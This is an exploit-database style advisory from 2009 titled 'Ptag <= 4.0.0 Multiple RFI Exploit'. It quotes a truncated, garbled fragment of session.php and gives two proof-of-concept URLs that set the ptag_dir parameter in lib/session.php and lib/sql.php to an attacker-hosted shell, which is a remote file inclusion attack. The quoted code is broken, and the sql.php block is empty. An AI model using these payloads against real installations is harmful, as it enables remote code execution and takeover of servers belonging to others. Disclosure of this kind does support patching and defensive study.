################################################################## ## Exploit Title: Ptag <= 4.0.0 Multiple RFI Exploit ## ## Date: 19-12-2009 ## ## Author: cr4wl3r ## ## Software Link: http://sourceforge.net/projects/ptag/ ## ## Version: N/A ## ## Tested on: GNU/LINUX ## ################################################################## ~ Code [session.php] sql_table = ptag_prefix."session"; $this -> cookie_name = ptag_prefix."session"; //If RSS mode, switch session to non-viewed tracker. if (ptag_output == "rss"){ parent::__construct($ptag_sql, sha1("")); } else{ parent::__construct($ptag_sql); } } } ?> ~ PoC [Ptag_path]/lib/session.php?ptag_dir=[Shell] ~ Code [sql.php] ~ PoC [Ptag_path]/lib/sql.php?ptag_dir=[Shell]